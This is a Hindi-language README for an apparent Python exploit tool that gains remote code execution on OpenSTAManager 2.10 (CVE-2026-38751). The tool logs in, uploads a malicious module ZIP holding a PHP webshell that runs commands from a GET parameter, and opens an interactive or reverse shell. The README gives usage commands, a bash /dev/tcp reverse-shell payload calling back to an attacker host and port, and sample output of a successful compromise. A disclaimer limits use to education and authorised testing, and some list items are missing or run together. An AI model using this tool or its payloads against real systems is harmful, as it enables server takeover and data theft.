
OpenSTAManager RCE Exploit (CVE-2026-38751)
यह Python स्क्रिप्ट OpenSTAManager संस्करण 2.10 में Remote Code Execution (RCE) भेद्यता का शोषण करती है, जिसे CVE-2026-38751 के रूप में पहचाना गया है। यह एक्सप्लॉइट प्रमाणित उपयोगकर्ताओं को एक दुर्भावनापूर्ण मॉड्यूल अपलोड करने और लक्षित सिस्टम पर मनमाने कमांड निष्पादित करने की अनुमति देता है।
एक्सप्लॉइट निम्नलिखित चरणों का पालन करता है:
MODULE)shell.php) जो GET पैरामीटर c के माध्यम से कमांड निष्पादित करती हैrequests, zipfilepython3 exploit.py -u http://target.com -U admin -P password
python3 exploit.py -u http://target.com -U admin -P password --interactive
python3 exploit.py -u http://target.com -U admin -P password --lhost 10.10.14.180 --lport 4444
| आर्ग्युमेंट | विवरण |
|---|---|
-u, --url | लक्षित URL (आवश्यक) |
-U, --user | प्रमाणीकरण के लिए उपयोगकर्ता नाम (आवश्यक) |
-P, --password | प्रमाणीकरण के लिए पासवर्ड (आवश्यक) |
--interactive | इंटरैक्टिव शेल मोड में प्रवेश करें |
--no-cleanup | निष्पादन के बाद शेल फ़ाइलें न हटाएं |
--lhost | रिवर्स शेल के लिए स्थानीय होस्ट |
--lport | रिवर्स शेल के लिए स्थानीय पोर्ट |
shell/MODULE: मॉड्यूल कॉन्फ़िगरेशन फ़ाइलshell/shell.php: PHP वेबशेल जो GET पैरामीटर c के माध्यम से पास किए गए कमांड निष्पादित करती हैid जैसे सरल कमांड को निष्पादित करके अपलोड की गई शेल का परीक्षण करता हैएक्सप्लॉइट कई रिवर्स शेल पेलोड का प्रयास करता है:
bash -i >& /dev/tcp/{lhost}/{lport} 0>&1⚠️ अस्वीकरण: यह एक्सप्लॉइट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है।
यह भेद्यता निम्नलिखित की अनुमति देती है:
इस भेद्यता से सुरक्षा के लिए:
[ OpenSTAManager RCE Exploit : ]
Target: http://target.com
[*] Step 1: Login...
[+] Login successful: admin
[*] Step 2: Enable updates...
[+] Updates enabled
[*] Step 3: Create ZIP...
[*] Created in-memory ZIP file
[*] Shell location: /modules/shell/shell.php
[*] Step 4: Upload...
[*] Upload status: 200
[+] Upload successful
[*] Step 5: Verify...
[+] Vulnerability confirmed!
[+] Shell: http://target.com/modules/shell/shell.php
[+] Test: http://target.com/modules/shell/shell.php?c=whoami
[*] Entering interactive mode...
cmd> whoami
www-data
cmd> exit
यह एक्सप्लॉइट केवल शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। उन सिस्टमों के विरुद्ध अनधिकृत उपयोग, जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है, अवैध है।